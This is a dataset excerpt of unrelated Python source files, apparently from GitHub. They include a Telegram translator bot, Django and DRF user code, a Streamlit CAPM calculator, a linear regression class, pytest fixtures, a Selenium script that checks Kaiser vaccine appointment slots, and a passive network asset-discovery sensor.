check_error()\n","repo_name":"flash-center/opacplot2","sub_path":"opacplot2/scripts/opac_error.py","file_name":"opac_error.py","file_ext":"py","file_size_in_byte":32047,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"19"} +{"seq_id":"46059533428","text":"# Get token of telegram chat bot\nfile = open(\"Telegram_chatbot_token.txt\",\"r\")\nToken = file.read()\n\nCallBot = \"No\"\nAskBot = \"No\"\nBotAsk = \"No\"\nChat_id = None\n\nfrom telegram.ext import Updater,CommandHandler,MessageHandler,Filters\nfrom Translator import translatorAI\n\ndef main():\n # Updater update from telegram and push it to Dispatcher\n updater = Updater(Token)\n\n # Link updater with dispatcher\n dispatcher = updater.dispatcher\n print(\"Bot start\")\n\n # Add command handle vs message handle\n start_handler = CommandHandler(['Ronet','hi'],start)\n translate_handler = CommandHandler('translate',translate)\n Message_handler = MessageHandler(Filters.text,sendMessage)\n\n dispatcher.add_handler(start_handler)\n dispatcher.add_handler(translate_handler)\n dispatcher.add_handler(Message_handler)\n\n # Start chatbot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C\n updater.idle()\n\n# Handle start command\ndef start(bot, update):\n update.message.reply_text(\"Hi, I am translator bot !\")\n print(update.message.chat.id)\n\n# Handle command translate\ndef translate(bot,update):\n string=update.message.text[11:]\n update.message.reply_text(\"It may take some minutes ...\")\n update.message.reply_text(\"Translate: \\n\"+translatorAI(string))\n\n# Handler conversation with both \ndef sendMessage(bot,update):\n # Define global var for state of conversation\n global AskBot, CallBot, BotAsk, Chat_id\n\n # put message received onto analyze\n String = update.message.text\n List = String.split(' ')\n\n # Try to make bot deploy on single conversation\n if Chat_id == update.message.chat_id or Chat_id is None:\n\n # state 1: bot ask usr for conversation\n if CallBot == \"No\" and AskBot == \"No\" 
and BotAsk == \"No\":\n for name in List:\n if name == \"@ronet20190310_bot\":\n Chat_id = update.message.chat_id\n bot.sendMessage(Chat_id,\"Do you call me ?\")\n BotAsk = \"Yes\"\n return\n bot.sendMessage(Chat_id,\"This conversation close\")\n BotAsk = CallBot = AskBot = \"No\"\n Chat_id = None\n\n # state 2: usr confirm conversation\n elif BotAsk == \"Yes\" and CallBot == \"No\" and AskBot == \"No\":\n for name in List:\n if name == \"yes\" or name == \"Yes\":\n bot.sendMessage(Chat_id,\"What do you want ?\")\n CallBot = \"Yes\"\n return\n bot.sendMessage(Chat_id,\"This conversation close\")\n BotAsk = CallBot = AskBot = \"No\"\n Chat_id = None\n\n # state 3: usr ask bot for function\n elif BotAsk == \"Yes\" and CallBot == \"Yes\" and AskBot == \"No\":\n for name in List:\n if name == \"translate\" or name == \"Translate\":\n bot.sendMessage(Chat_id,\"Enter text you want to translate !\")\n AskBot = \"Yes\"\n return\n bot.sendMessage(Chat_id,\"This feature not yet update on me, sorry\\n This conversation close\") \n BotAsk = CallBot = AskBot =\"No\"\n Chat_id = None\n\n # state 4: bot answer usr\n elif BotAsk == \"Yes\" and CallBot == \"Yes\" and AskBot == \"Yes\":\n bot.sendMessage(Chat_id,\"Please waiting for translation ...\")\n bot.sendMessage(Chat_id,translatorAI(String))\n bot.sendMessage(Chat_id,\"This conversation close\")\n BotAsk = CallBot = AskBot = \"No\"\n Chat_id = None\n\n else:\n bot.sendMessage(update.message.chat_id,\"Bot is busy now\")\n \n# Main runnning function\nif __name__ == '__main__':\n main()\n","repo_name":"larycoder/chatbots","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"30762178618","text":"from django.urls import path\nfrom ecommerce.views import user_views as views\n\nurlpatterns = [\n # using the custom token view that has custom user data\n path('login/', views.MyTokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('register/', views.registerUser, name=\"register\"),\n path('profile/', views.getUser, name=\"users-profile\"),\n path('profile/update/', views.updateUser, name=\"users-profile-update\"),\n path('', views.getUsers, name=\"users\"),\n\n]","repo_name":"Jacob-Hoff-man/django-ecommerce","sub_path":"django-ecommerce/ecommerce/urls/user_urls.py","file_name":"user_urls.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40749180213","text":"from actions.evaluate import evaluate\n\n\ndef loseLife(game, source, player, amountToLose):\n \"\"\"Set the life total for selected player to (current life - the amount to lose)\n\n Args:\n game (Game): Game Object\n source (Card): Source of the life loss\n player (Player): Player that is loosing life\n amountToLose (Int): The amount of life to lose\n\n Returns:\n None\n \"\"\"\n if amountToLose == 0:\n return\n player.lifeTotal -= amountToLose\n\n game.notifyAll(\"Life Total Update\", {\n \"gameID\": game.gameID,\n \"playerID\": player.playerID,\n \"life\": player.lifeTotal\n })\n\n\ndef gainLife(game, source, player, amountToGain):\n \"\"\"Set the life total for selected player to (current life + the amount to gain)\n\n Args:\n game (Game): Game Object\n source (Card): Source of the life gain\n player (Player): Player that is gaining life\n amountToGain (Int): The amount of life to gain\n\n Returns:\n None\n \"\"\"\n if amountToGain == 0:\n 
return\n\n    player.lifeTotal += amountToGain\n\n    game.notifyAll(\"Life Total Update\", {\n        \"gameID\": game.gameID,\n        \"playerID\": player.playerID,\n        \"life\": player.lifeTotal\n    })\n\n\ndef setLife(game, source, player, newTotal):\n    \"\"\"Sets the life total of the selected player to the specified amount\n\n    Args:\n        game (Game): Game Object\n        source (Object): Source that is setting the player's life total\n        player (Player): Player whose life total is being set\n        newTotal (Int): New life total\n\n    Returns:\n        None\n    \"\"\"\n    if player.getLife() == newTotal:\n        pass\n    elif (player.getLife() > newTotal):\n        evaluate(game, loseLife, source=source, player=player, amountToLose=(player.getLife() - newTotal))\n    else:\n        evaluate(game, gainLife, source=source, player=player, amountToGain=(newTotal - player.getLife()))\n","repo_name":"0xBC9/Cardname-Server","sub_path":"engine/actions/life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"71153841325","text":"def plastic_balance(lst):\n    on = True\n    while on:\n        if len(lst) == 1:\n            if lst[0] + lst[0] != 0:\n                return []\n            else: \n                return lst\n        if lst == []:\n            return []\n        if lst[0] + lst[-1] != sum(lst[1:-1]):\n            del lst[0]\n            del lst[-1]\n            continue\n        if lst[0] + lst[-1] == sum(lst[1:-1]):\n            return lst\n    \n\n\nprint(plastic_balance([0,104,3,101,0,111]))","repo_name":"DovydasMen/codewars","sub_path":"plastci_balance.py","file_name":"plastci_balance.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37194912727","text":"# BOJ 1978 - Finding Prime Numbers\n\nimport sys\nfrom collections import deque\nimport math\ninput = sys.stdin.readline\n\nT = int(input())\narr = list(map(int, input().split()))\ncnt = 0\n\ndef prime(_n):\n    if _n < 2:\n        return False\n    for i in range(2, int(math.sqrt(_n))+1):\n        if _n % i == 0:\n            return False\n    return True\n\nfor i in range(T):\n    if prime(arr[i]):\n        cnt += 1\n\nprint(cnt)\n","repo_name":"underflow101/BOJ_solve","sub_path":"1978 - 소수 찾기/1978.py","file_name":"1978.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44330097553","text":"# importing libraries\nimport streamlit as st\nimport datetime\nimport pandas_datareader.data as web\nimport yfinance as yf\nimport pandas as pd\nimport capm_functions\nimport numpy as np\nimport plotly.express as px\n\n# setting page config\nst.set_page_config(\n\n    page_title=\"CAPM\",\n    page_icon=\"chart_with_upwards_trend\",\n    layout=\"wide\",\n    )\n\nst.title('Calculate Beta and Return for individual stock')\n\n# getting input from user\ncol1, col2 = st.columns([1,1])\nwith col1:\n    stock = st.selectbox(\"Choose a stock\" , ('TSLA', 'AAPL','NFLX','MGM','MSFT','AMZN','NVDA','GOOGL'))\nwith col2:\n    year = st.number_input(\"Number of Years\",1,10)\n\n# downloading data for SP500\nend = datetime.date.today()\nstart = datetime.date(datetime.date.today().year - year, datetime.date.today().month, datetime.date.today().day)\nSP500 = web.DataReader(['sp500'], 'fred', start, end)\n\n# downloading data for the stock\nstocks_df = yf.download(stock, period = f'{year}y')\nstocks_df = stocks_df[['Close']]\nstocks_df.columns = [f'{stock}']\nstocks_df.reset_index(inplace = True)\nSP500.reset_index(inplace = True)\nSP500.columns = ['Date','sp500']\nstocks_df['Date'] = 
stocks_df['Date'].astype('datetime64[ns]')\nstocks_df['Date'] = stocks_df['Date'].apply(lambda x:str(x)[:10])\nstocks_df['Date'] = pd.to_datetime(stocks_df['Date'])\nstocks_df = pd.merge(stocks_df, SP500, on = 'Date', how = 'inner')\n\n# calculating daily return \nstocks_daily_return = capm_functions.daily_return(stocks_df)\n\n# calculate beta and alpha\nbeta, alpha = capm_functions.calculate_beta(stocks_daily_return, stock)\n\n# risk free rate of return\nrf = 0\n\n# market portfolio return\nrm = stocks_daily_return['sp500'].mean()*252\n\n# calculate return\nreturn_value = round(rf+(beta*(rm-rf)),2)\n\n# showing results\nst.markdown(f'### Beta : {beta}')\nst.markdown(f'### Return : {return_value}')\nfig = px.scatter(stocks_daily_return, x = 'sp500', y = stock, title = stock)\nfig.add_scatter(x = stocks_daily_return['sp500'], y = beta*stocks_daily_return['sp500'] + alpha, line=dict(color=\"crimson\"))\nst.plotly_chart(fig, use_container_width=True)","repo_name":"mdaamir6870/Capital-Asset-Pricing-Model","sub_path":"pages/Calculate_Beta.py","file_name":"Calculate_Beta.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"3404031271","text":"#-*- coding:utf-8 -*-\n\nfrom lib._http_tcp_shark import tcp_http_shark\nfrom lib._http_tcp_pcap import tcp_http_pcap\nfrom lib._util import check_lock\nfrom lib._util import _syslog_msg_send, _http_msg_send, _tcp_msg_send\nimport getopt\nimport sys\nimport os\nimport threading\n# import queue\nimport collections\nimport signal\nimport traceback\nimport time\n\n# Address and port of the data receiving server\nserver_ip = '127.0.0.1'\nserver_port = 514\n# Network interface to capture on\ninterface = 'eth0'\n# Host identifier\ncustom_tag = '127.0.0.1'\n# bpf_filter\nbpf_filter = 'tcp'\n# display_filter\ndisplay_filter = 'tcp'\n# Debug mode: also print data to the console\ndebug = False\n# Analyze chunked/gzip bodies (significant performance cost)\nreturn_deep_info = False\n# Deduplication cache size\ncache_size = 4096\n# Traffic session table size\nsession_size = 4096\n# Interval at which tshark flushes memory (seconds, default one hour); packet receive timeout for pcap (milliseconds, default 3.6 s)\ntimeout = 3600\n# Number of sender threads\nmsg_send_thread_num = 2\n# Maximum size of the send queue\nmax_queue_size = 50000\n# Asset data transport mode; only TCP, HTTP and SYSLOG are supported\nmsg_send_mode = 'TCP'\n# Traffic capture engine; only TSHARK and PCAP are supported\nengine = \"PCAP\"\n# Data types collected by the pcap engine: TCP, HTTP\npcap_collection_data = 'TCP/HTTP'\n\n# HTTP data filters\nhttp_filter = {\n\t\"response_code\": ['304', '400', '404'],\n\t\"content_type\": [\n\t\t'audio/',\n\t\t'video/',\n\t\t'image/',\n\t\t'font/',\n\t\t'application/pdf',\n\t\t'application/msword',\n\t\t'application/javascript',\n\t\t'text/javascript',\n\t\t'text/css'\n\t]\n}\n\ndef Usage():\n\tprint('''\n ###################################################################\n # passets-sensor 1.0.0 #\n ###################################################################\n -------------------------------------------------------------------\n Usage:\n python3 main.py [options] ...\n\n -i Name or idx of interface(def: None)\t\t \n -s server ip(def: None)\n -p server port(def: None)\n -t Source identification(def: localhost)\n -c Cache size(def: 1024)\n -S Session size(def: 1024)\n -T Memory clear time(def: 3600 sec)\n -d Debug information switch(def: off)\n -------------------------------------------------------------------\n\t''')\n\tsys.exit()\n\ndef tshark_analysis(work_queue):\n\n\tshark_obj = tcp_http_shark(work_queue, interface, custom_tag, return_deep_info, http_filter, cache_size, session_size, bpf_filter, timeout, debug)\n\tshark_obj.run()\n\ndef pcap_analysis(work_queue):\n\tpcap_obj = 
tcp_http_pcap(pcap_collection_data, int(max_queue_size), work_queue, interface, custom_tag, return_deep_info, http_filter, cache_size, session_size, bpf_filter, timeout, debug)\n\tpcap_obj.run()\n\nclass thread_msg_send(threading.Thread):\n\tdef __init__(self, work_queue, msg_send_mode):\n\n\t\tthreading.Thread.__init__(self)\n\t\tself.work_queue = work_queue\n\t\tself.msg_send_mode = msg_send_mode\n\t\tself.msg_obj = self.msg_obj_fun(self.msg_send_mode)\n\n\tdef msg_obj_fun(self, msg_send_mode):\n\t\tif msg_send_mode == \"TCP\":\n\t\t\tmsg_obj = _tcp_msg_send(server_ip,server_port)\n\t\telif msg_send_mode == \"HTTP\":\n\t\t\thttp_url = \"http://{}:{}/\".format(server_ip,server_port)\n\t\t\tmsg_obj = _http_msg_send(http_url)\n\t\telif msg_send_mode == \"SYSLOG\":\n\t\t\tmsg_obj = _syslog_msg_send(server_ip,server_port)\n\t\telse:\n\t\t\tmsg_obj = ''\n\t\treturn msg_obj\n\n\tdef run(self):\n\t\ttcp_flag = True if self.msg_obj else False\n\t\t# total_msg_num = 0\n\t\twhile True:\n\t\t\t# start = time.time()\n\t\t\tif not tcp_flag:\n\t\t\t\tself.msg_obj = self.msg_obj_fun(self.msg_send_mode)\n\t\t\tif len(self.work_queue):\n\t\t\t\tresult = self.work_queue.popleft()\n\t\t\t\tif msg_send_mode == \"TCP\":\n\t\t\t\t\ttcp_flag = self.msg_obj.info(result)\n\t\t\t\t\t# total_msg_num += 1\n\t\t\t\t\t# if total_msg_num%100 == 0:\n\t\t\t\t\t\t# end = time.time()\n\t\t\t\t\t\t# print(\"Used Time: %s\"%(end - start))\n\t\t\t\telse:\n\t\t\t\t\tself.msg_obj.info(result)\n\n\t\nif __name__ == '__main__':\n\n\t# Launched via crontab on the host machine:\n\t# */5 * * * * root /usr/bin/python3 /passets-sensor/main.py >> /dev/null 2>&1\n\t# check_lock()\n\n\ttry:\n\t\topts,args = getopt.getopt(sys.argv[1:],'i: s: p: d: t: r: c: T: S:')\n\texcept:\n\t\tUsage()\n\tif len(opts) < 3:\n\t\tUsage()\n\n\tfor o, a in opts:\n\t\tif o == \"-i\":\n\t\t\tinterface = str(a)\n\t\tif o == '-s':\n\t\t\tserver_ip = str(a)\n\t\tif o == '-t':\n\t\t\tcustom_tag = str(a)\n\t\tif o == '-p': \n\t\t\tserver_port = int(a)\n\t\tif o == '-d':\n\t\t\tdebug_str = str(a)\n\t\t\tif debug_str == 'on':\n\t\t\t\tdebug = True\n\t\tif o == '-r':\n\t\t\treturn_switch_str = str(a)\n\t\t\tif return_switch_str == 'on':\n\t\t\t\treturn_deep_info = True\n\t\t\telse:\n\t\t\t\treturn_deep_info = False\n\t\tif o == '-c':\n\t\t\tcache_size = int(a)\n\t\tif o == '-S':\n\t\t\tsession_size = int(a)\n\t\t\tif session_size == 0:\n\t\t\t\tsession_size = 1024\n\t\tif o == '-T':\n\t\t\ttimeout = int(a)\n\n\tif interface and server_ip and server_port:\n\t\t# Accept filter settings passed in via environment variables\n\t\tif 'http_filter_code' in os.environ:\n\t\t\thttp_filter['response_code'] = list(set(filter(None, os.environ[\"http_filter_code\"].replace(\" \",\"\").split(\",\"))))\n\t\tif 'http_filter_type' in os.environ:\n\t\t\thttp_filter['content_type'] = list(set(filter(None, os.environ[\"http_filter_type\"].replace(\" \",\"\").split(\",\"))))\n\t\tbpf_filter += ' and not (host {} and port {}) and not (host 127.0.0.1 or host localhost) '.format(server_ip,server_port)\n\n\t\ttry:\n\t\t\t# work_queue = queue.LifoQueue(max_queue_size)\n\t\t\twork_queue = collections.deque(maxlen=int(max_queue_size))\n\t\t\t\n\t\t\tfor i in range(msg_send_thread_num):\n\t\t\t\tmsg_thread_obj = thread_msg_send(work_queue, msg_send_mode)\n\t\t\t\tmsg_thread_obj.setDaemon(True)\n\t\t\t\tmsg_thread_obj.start()\n\n\t\t\tif engine == 'PCAP':\n\t\t\t\tpcap_analysis(work_queue)\n\t\t\telif engine == 'TSHARK':\n\t\t\t\ttshark_analysis(work_queue)\n\n\t\texcept 
KeyboardInterrupt:\n\t\t\tprint('\\nExit.')\n\t\t\tos.kill(os.getpid(),signal.SIGKILL)\n\t\texcept :\n\t\t\ttraceback.print_exc()\n\telse:\n\t\tUsage()","repo_name":"DSO-Lab/passets-sensor","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5839,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"12679565618","text":"from dj_rest_auth.registration.serializers import RegisterSerializer\nfrom dj_rest_auth.serializers import LoginSerializer\nfrom django.contrib.auth import get_user_model, models\nfrom drf_extra_fields.fields import Base64ImageField\nfrom drf_spectacular.utils import extend_schema_field\nfrom rest_framework import serializers\n\nfrom admin.utils import get_timestamp_path\nfrom users.models import CustomUser, Contact\n\n\nclass AuthLoginSerializer(LoginSerializer):\n username = None\n\n\nclass CustomRegisterSerializer(RegisterSerializer):\n username = None\n first_name = serializers.CharField(required=True, write_only=True)\n last_name = serializers.CharField(required=True, write_only=True)\n email = serializers.EmailField(required=True)\n password1 = serializers.CharField(required=True, write_only=True)\n password2 = serializers.CharField(required=True, write_only=True)\n is_builder = serializers.BooleanField(required=True)\n\n def custom_signup(self, request, user):\n user.is_builder = self.validated_data.get('is_builder', user.is_builder)\n user.save(update_fields=['is_builder'])\n\n def get_cleaned_data(self):\n return {\n 'first_name': self.validated_data.get('first_name', ''),\n 'last_name': self.validated_data.get('last_name', ''),\n 'password1': self.validated_data.get('password1', ''),\n 'email': self.validated_data.get('email', ''),\n 'is_builder': self.validated_data.get('is_builder', '')\n }\n\n\nclass ContactSerializer(serializers.ModelSerializer):\n class Meta:\n model = Contact\n fields = ['id', 'first_name', 'last_name', 'phone', 'email']\n read_only_fields = ['id']\n\n\nclass ProfileSerializer(serializers.ModelSerializer):\n agent_contacts = ContactSerializer()\n avatar = Base64ImageField(required=False)\n\n def update(self, instance, validated_data):\n # Add your custom logic here for updating the instance\n # For example, you can update specific fields of the instance based on the validated_data\n if 'agent_contacts' in validated_data:\n contact = Contact.objects.get(user=instance)\n contact.email = validated_data['agent_contacts'].get('email', contact.email)\n contact.phone = validated_data['agent_contacts'].get('phone', contact.phone)\n contact.first_name = validated_data['agent_contacts'].get('first_name', contact.first_name)\n contact.last_name = validated_data['agent_contacts'].get('last_name', contact.last_name)\n contact.save()\n # You can also perform any additional custom operations\n instance.email = validated_data.get('email', instance.email)\n instance.phone = validated_data.get('phone', instance.phone)\n instance.avatar = validated_data.get('avatar', instance.avatar)\n instance.first_name = validated_data.get('first_name', instance.first_name)\n instance.last_name = validated_data.get('last_name', instance.last_name)\n instance.notification_type = validated_data.get('notification_type', instance.notification_type)\n instance.redirect_notifications_to_agent = validated_data.get('redirect_notifications_to_agent',\n instance.redirect_notifications_to_agent)\n instance.save()\n\n return instance\n\n class Meta:\n model = CustomUser\n fields = [\n 'id',\n 
'first_name',\n 'last_name',\n 'phone',\n 'email',\n 'avatar',\n 'is_active',\n 'is_staff',\n 'last_login',\n 'date_joined',\n 'notification_type',\n 'agent_contacts',\n 'redirect_notifications_to_agent',\n ]\n","repo_name":"DanilHushchyn/SwipeAPI","sub_path":"users/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70530548842","text":"import numpy as np\n\nclass MyLinearRegression():\n \"\"\"\n Description:\n My personnal linear regression class to fit like a boss.\n \"\"\"\n\n def __init__(self, thetas, alpha=0.001, max_iter=1000):\n if not isinstance(thetas, np.ndarray) or thetas.size == 0:\n return None\n self.alpha = alpha\n self.max_iter = max_iter\n self.thetas = thetas\n\n def DataChecker(func):\n def wrapper(self, *args, **kwargs):\n for item in args:\n if not isinstance(item, np.ndarray)\\\n or not np.issubdtype(item.dtype, np.number):\n return None\n res = func(self, *args, **kwargs)\n return res\n return wrapper\n\n @DataChecker\n def fit_(self, x, y):\n\n X = np.insert(x, 0, 1, axis=1)\n for _ in range(self.max_iter):\n self.thetas = self.thetas - self.alpha\\\n * (X.T @ ((X @ self.thetas) - y)) / y.shape[0]\n\n return self.thetas\n\n @DataChecker\n def predict_(self, x):\n\n x = x.reshape(-1, 1) if len(x.shape) < 2 else x\n X = np.insert(x, 0, 1, axis=1)\n\n theta = self.thetas.reshape(-1, 1) if len(self.thetas.shape) < 2 else self.thetas\n\n if X.shape[1] != theta.shape[0] and theta.shape != (2, 1):\n return None\n\n return X @ theta\n\n @DataChecker\n def loss_elem_(self, y, y_hat):\n\n return (y - y_hat)**2\n\n @DataChecker\n def loss_(self, y, y_hat):\n\n return float(sum((y - y_hat)**2)/(2 * y.shape[0]))\n\n @staticmethod\n def mse_(y, y_hat):\n\n return float(sum((y - y_hat)**2)/(y.shape[0]))\n\nif __name__ == '__main__':\n import math\n import numpy as np\n from my_linear_regression import MyLinearRegression as MyLR\n x = np.array([[12.4956442], [21.5007972], [31.5527382], [48.9145838], [57.5088733]])\n y = np.array([[37.4013816], [36.1473236], [45.7655287], [46.6793434], [59.5585554]])\n lr1 = MyLR(np.array([[2], [0.7]]))\n\n # Example 0.0:\n y_hat = lr1.predict_(x)\n print(y_hat, '\\n')\n # Output:\n ## array([[10.74695094],\n ## [17.05055804],\n ## [24.08691674],\n ## [36.24020866],\n ## [42.25621131]])\n\n # Example 0.1:\n print(lr1.loss_elem_(y, y_hat), '\\n')\n # Output:\n ## array([[710.45867381],\n ## [364.68645485],\n ## [469.96221651],\n ## [108.97553412],\n ## [299.37111101]])\n\n # Example 0.2:\n print(lr1.loss_(y, y_hat), '\\n')\n # Output:\n ## 195.34539903032385\n\n # Example 1.0:\n lr2 = MyLR(np.array([[1], [1]]), 5e-8, 1500000)\n lr2.fit_(x, y)\n print(lr2.thetas, '\\n')\n # Output:\n #array([[1.40709365],\n #[1.1150909 ]])\n\n # Example 1.1:\n y_hat = lr2.predict_(x)\n print(y_hat, '\\n')\n # Output:\n ## array([[15.3408728 ],\n ## [25.38243697],\n ## [36.59126492],\n ## [55.95130097],\n ## [65.53471499]])\n\n # Example 1.2:\n print(lr2.loss_elem_(y, y_hat), '\\n')\n # Output:\n ## array([[486.66604863],\n ## [115.88278416],\n ## [ 84.16711596],\n ## [ 85.96919719],\n ## [ 35.71448348]])\n\n # Example 1.3:\n print(lr2.loss_(y, y_hat), '\\n')\n # Output:\n ## 
80.83996294128525\n","repo_name":"BenElhadj/42-Piscine-ML","sub_path":"ML01/ex03/my_linear_regression.py","file_name":"my_linear_regression.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39885873059","text":"# -*- coding: utf-8 -*-\nfrom gluon import *\n\n\ndef Fase_Table(db, T):\n    db.define_table('Fase',\n                    Field('numero', 'integer',\n                          requires=[IS_NOT_EMPTY\n                                    (error_message='Es necesario un numero de identificacion')],\n                          label='Numero'),\n                    Field('plan_trabajo', 'reference Plan_Trabajo',\n                          label='Pasantía (*)',\n                          writable=False),\n                    Field('objetivo_especifico', 'text',\n                          requires=[IS_NOT_EMPTY\n                                    (error_message='Es necesario un objetivo')],\n                          label='Objetivo Específico'),\n                    Field('descripcion', 'text',\n                          requires=[IS_NOT_EMPTY\n                                    (error_message='Es necesario una Descripcion')],\n                          label='Descripción'),\n                    format=lambda r: '%s - %s' % (r.numero, r.objetivo_especifico)\n                    )\n","repo_name":"cadena-si-usb/SPE","sub_path":"applications/SPE_lib/modules/db_6_Fase.py","file_name":"db_6_Fase.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70334218604","text":"# Official documentation: https://learning-pytest.readthedocs.io/zh/latest/doc/fixture/intro.html\n\nimport pytest\n\n'''\n@pytest.fixture(scope='session', autouse=True)\ndef fixture_session():\n    print('\\nsession: before all test cases####################')\n    yield\n    print('\\nsession: after all test cases####################')\n\n\n@pytest.fixture(scope='function', autouse=True)\ndef fixture_function():\n    print('\\n function: before each test case####################')\n    yield\n    print('\\n function: after each test case####################')\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef fixture_module():\n    print('\\n module: before each test module===================>')\n    yield\n    print('\\n module: after each test module===================>')\n\n\n@pytest.fixture(scope='class', autouse=True)\ndef fixture_class():\n    print('\\n class: before each test class===================>')\n    yield\n    print('\\n class: after each test class===================>')\n\n\n'''\n\n@pytest.fixture(scope='session', name='lg')\ndef login_and_loginout():\n    print(\"\\nLogging in to xxxxxx, fetching token...\")\n    token = '9999999'\n    yield token\n    print('\\nLogging out####################')\n\n\n\n","repo_name":"loomz/testcase_time_geek","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13798745406","text":"import time\nimport urllib.parse\n\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nimport requests\nfrom selenium.webdriver.support.wait import WebDriverWait\nimport os\n\nfrom checker.common.report_object import ReportObject\nfrom checker.common.setup_logger import logger\nfrom checker.common.session_object import SessionObject\nfrom checker.common.twilio_notifier import TwilioNotifier\n\nfrom dotenv import load_dotenv\n\nfrom checker.exception.login_exception import LoginExpiredException\nfrom checker.exception.token_exception import TokenExpiredException\n\nload_dotenv()\n\nclass KaiserNorCal:\n\n    LOGIN_REQUEST = 
'https://mydoctor.kaiserpermanente.org/ncal/appointments/#/selectFacility/covid19-vaccination/dose1-evisit'\n FACILITIES_REQUEST = 'https://mydoctor.kaiserpermanente.org/mdo/api/v2/appointments/covid_dose1_evisit/facilities'\n SLOT_REQUEST = 'https://mydoctor.kaiserpermanente.org/mdo/api/v2/appointments/covid_dose1_evisit/facilities'\n SLOT_DELETE = 'https://mydoctor.kaiserpermanente.org/mdo/api/v2/appointments/slot-locks'\n\n def __init__(self):\n self.name = \"Kaiser Northern California\"\n self.session = SessionObject()\n self.facilities = []\n\n ##-------------------------------\n ## EXECUTE\n ##-------------------------------\n\n def execute(self):\n start = time.perf_counter()\n\n report = ReportObject()\n report.strategy = self.name\n\n #build the session here\n if not self.session.is_active():\n #if login is expired, we should probbaly build both\n if not self.session.is_login_active():\n logger.info('building full session...')\n if self.do_login(True):\n self.get_facilities()\n else:\n logger.warning('unable to build login')\n if not self.session.is_token_active():\n logger.info('refreshing token...')\n self.get_facilities()\n\n #start processing - at this point we hopefully have a valid session\n if self.session.is_active():\n logger.info('making requests...')\n for facility in self.facilities:\n status = self.check_slots_by_facility(facility)\n report.add_facility(facility, status)\n else:\n logger.warning('session was not active, something happened')\n\n end = time.perf_counter()\n\n report.duration=end-start\n logger.info(report.to_string())\n\n return report\n\n ##-------------------------------\n\n def check_slots_by_facility(self, facility_code):\n logger.debug('checking for slots in facility '+ facility_code)\n #hit facility\n status = self.request_slots(facility_code)\n\n #if there is a slot - open browser, force cookies\n if status==1:\n self.get_appointment()\n else:\n #delete the appointment\n self.delete_appointment()\n\n return status\n\n ##-------------------------------\n ## HELPER METHODS\n ##-------------------------------\n\n def do_login(self, is_headless):\n login_u = os.getenv('KAISER_LOGIN')\n login_p = os.getenv('KAISER_PASSWORD')\n browser_path = os.getenv('PATH_TO_FIREFOX_DRIVER')\n\n #set the time when i rebuild this\n self.created_at=time.time()\n self.session.set_login(login_u)\n\n opts = Options()\n opts.headless = is_headless\n browser = Firefox(options=opts, executable_path=browser_path)\n browser.get(self.LOGIN_REQUEST)\n\n login_username_field = browser.find_element_by_id('username')\n login_username_field.send_keys(login_u)\n login_password_field = browser.find_element_by_id('password')\n login_password_field.send_keys(login_p)\n\n login_submit = browser.find_element_by_id('sign-on')\n login_submit.submit()\n\n # need the browser to load the my doctor online page\n delay = 5\n try:\n WebDriverWait(browser, delay).until(EC.presence_of_element_located((By.ID, 'member-select-id')))\n logger.debug('Page loaded.')\n except TimeoutException:\n logger.warning('Loading took too long...')\n return False\n\n self.session.set_cookies_raw(browser.get_cookies())\n logger.debug(f\"COOKIE: {self.session.cookies}\")\n\n if is_headless:\n browser.close()\n\n #TODO: need to create a condition where the login doesnt work\n\n return True\n\n ##-------------------------------\n\n def get_facilities(self):\n logger.debug('getting facility list and token...')\n\n headers = {'Cookie': self.session.cookies}\n\n try:\n response = requests.get(self.FACILITIES_REQUEST, 
headers=headers)\n response.raise_for_status()\n except requests.exceptions.HTTPError as errh:\n logger.debug(\"Http Error:\", errh)\n #most likely login is out of date\n raise LoginExpiredException(errh)\n except requests.exceptions.ConnectionError as errc:\n logger.error(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n logger.error(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n logger.error(\"Oops: Something Else\", err)\n else:\n if (response):\n t = response.json()\n\n if 'token' in t:\n token = t['token']\n logger.debug(f\"TOKEN: {token}\")\n self.session.set_token(token)\n\n return t\n else:\n logger.warning('Response for facilities was empty')\n\n return None\n\n\n ##-------------------------------\n\n def request_slots(self, facility):\n logger.debug('requesting slots for '+ facility)\n\n sd = time.strftime('%d/%m/%Y')\n sd_str = urllib.parse.quote_plus(sd)\n\n params = {}\n params['tokenIdQuery'] = self.session.token\n params['showFirstAvailable'] = 'true'\n params['startDate'] = sd_str\n 